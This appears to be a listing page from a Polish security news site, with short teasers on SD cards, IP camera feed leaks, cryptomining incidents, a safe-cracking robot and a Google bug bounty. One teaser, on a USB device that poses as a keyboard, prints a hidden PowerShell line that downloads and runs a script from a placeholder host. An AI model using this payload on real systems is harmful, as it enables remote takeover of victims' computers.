Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Mikołajki z sekurakiem! od 2 do 8 grudnia!
Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Mikołajki z sekurakiem! od 2 do 8 grudnia!
Ciekawostka wakacyjna: niedawno pokazała się nowa specyfikacja znanych nam kart SD. Maksymalna pojemność to 128 TB (obecna specyfikacja przewiduje do 2 TB, choć obecnie bardzo trudno dostać nawet 1 TB kartę). Karty SD Express, poza standardowymi wymiarami i kompatybilnością wsteczną, mają oferować maksymalny, teoretyczny transfer do 985 MB/s – a…
Czytaj dalej »Krótka ciekawostka “ku pokrzepieniu serc”. U nas szykują się nowe parapodatki przy badaniach technicznych samochodów, a w Ugandzie wprowadzają podatek od dostępu do mediów społecznościowych (200 szylingów ugandyjskich ~= 20 groszy dziennie). Donosi o tym Time, pisząc: In addition to the usual data fees, social media users now must pay upfront…
Czytaj dalej »Cenimy Wasz czas. Więc maksymalna kondensacja: Aplikacja mobilna sparowana z kamerą IP firmy Swann ma możliwość podglądnięcia obrazu na żywo “ze swojej kamery”. Szkoda tylko, że nie zawsze “ze swojej“: jedna z użytkowniczek nagle dostała dziwne alerty ruchu w appce, czyli coś pojawiło się w kamerze. Okazało się, że jest…
Czytaj dalej »Zobaczcie hardenize.com – w kilka(naście) sekund otrzymacie raport dotyczący dowolnej domeny, choć informacje mamy tylko w obszarach: DNS, mail (np. brak szyfrowania, problemy z SPF) oraz WWW (problemy z certyfikatami SSL, nagłówkami http, …). Przykład: Nie jest to oczywiście pełny skan bezpieczeństwa Waszej infrastruktury, ale jeśli szybko / tanio można…
Czytaj dalej »Garść informacji o chińskim programie dronów przypominających ptaki (kryptonim Dove). Song Bifeng – główny mózg projektu, pracował wcześniej jako starszy naukowiec przy projekcie “niewidzialnego” myśliwca J-20, a obecny temat idzie również nieźle – właśnie za swój wkład w “Dove” został uhonorowany przez mundurowych z Chińskiej Armii Ludowo-Wyzwoleńczej. Zalet mamy dużo: “ptak” normalnie…
Czytaj dalej »Smutna historia bociana Kajtka. Najpierw polscy miłośnicy przyrody zamontowali na bocianie nadajnik, aby móc śledzić jego trasy przelotu: Jednak w kwietniu tego roku okazało się, że sygnał z nadajnika nagle się urwał. Może awaria? Nie, okazało się, że ktoś w Sudanie wyciągnął z urządzenia kartę SIM i wydzwonił z niej…
Czytaj dalej »W Rosji każdy orze jak może – jedni ogrzewają koparkami kryptowalut mieszkania, inni próbują kopać bitcoiny na superkomputerze służącym do badań nad bronią jądrową – tak przynajmniej donosi BBC i inne media. Rosyjska agencja Interfax potwierdza incydent, choć nie podaje wielu szczegółów (niespodzianka). Cała operacja miała mieć miejsce w mieście…
Czytaj dalej »Dokładnie taką historię opisuje Noah Dinkin – twierdzi, że po skorzystaniu z darmowego WiFi w argentyńskim Starbucksie, strona operatora zapewniającego tą usługę (chodzi tutaj zapewne o captive portal) … kopie walutę na przeglądarce klienta: Czy jest to celowe działanie, czy po prostu zhackowana strona – trudno jednoznacznie odpowiedzieć, Starbucks w każdym…
Czytaj dalej »Są instalacje (koparki) używane do ogrzewania pomieszczeń, są eksperymenty z podłączaniem koparek do turbin wiatrowych, a tym razem na facebookowej grupie Tesla Owners Worldwide umieszczone zostało zdjęcie koparki kryptowalut podpiętej do samochodu. Cały pomysł bazuje na darmowym ładowaniu zapewnianym przez Teslę (Lifetime Unlimited Supercharging), uzupełnionym o dość pojemną baterię (nawet…
Czytaj dalej »…a przynajmniej taki nowy trend próbuje spopularyzować Samsung. Oto koparka Bitcoinów wykonana z 40-stu Samsungów Galaxy S5: Jak to działa? Koreański producent przygotował specjalną wersję systemu operacyjnego, który nadaje się do zastosować w tzw. upcyclingu, czyli w wolnym tłumaczeniu nadania trupom nowego życia ;-) Jaka jest wydajność wspomnianej wyżej koparki? Delikatnie…
Czytaj dalej »Opis przygotowania pendrive, który po podłączeniu działa jak klawiatura. Klawiatura ta z kolei wpisuje zaprogramowaną wcześniej sekwencję klawiszy – np. uruchamia powershella i daje zdalny dostęp na docelowy komputer. Np. tak: Keyboard.println(“powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring(‘http://1.2.3.4:8080/’);”); Keyboard.write(KEY_RETURN); Sercem projektu jest produkt “Adafruit Trinket – Mini Microcontroller” –…
Czytaj dalej »Ostatnio media obiegła dość interesująca informacja o możliwości zsyntetyzowania takiego DNA, które da wykonanie kodu na maszynie, która służy do sekwencjonowania DNA (czyli w pewnym uproszczeniu poznania ciągu liter – odpowiadającym czterem parom nukleotydowym – wchodzących w skład DNA). Autorzy piszą w swojej pracy tak: We demonstrate, for the first time, the…
Czytaj dalej »Wiecie ile warta jest taka informacja: curl -k “https://yaqs.googleplex.com” –resolve “yaqs.googleplex.com:443:172.217.28.180” ? 10 000$ USD – taką bowiem kwotę wypłaciło Google za zgłoszenie buga, który polegał na wysłaniu jednego requestu do serwera 172.217.28.180 z ustawionym nagłówkiem Host: yaqs.googleplex.com – o dziwo, badaczowi wyświetliła się wtedy strona Google z treścią oznaczoną jako Google…
Czytaj dalej »Kiedyś były maszyny z LEGO do łamania pinów na telefonach, a na tegorocznym Defconie pokazano z kolei robota otwierającego sejf. Tym razem celem była maszyna firmy SentrySafe, posiadająca 3 gałki z liczbami od 00 do 99 – w najgorszym przypadku sejf wymagał podania miliona kombinacji, ale na tak długie sprawdzanie nie…
Czytaj dalej »No właśnie, kto czyta regulaminy? Żeby to sprawdzić, firma Purple udostępniająca hot spoty WiFi, w zasadach korzystania z nich umieściła następujący zapis: the user may bebe required, at Purple’s discretion, to carry out 1,000 hours of community service. This may include the following: Cleansing local parks of animal waste Providing…
Czytaj dalej »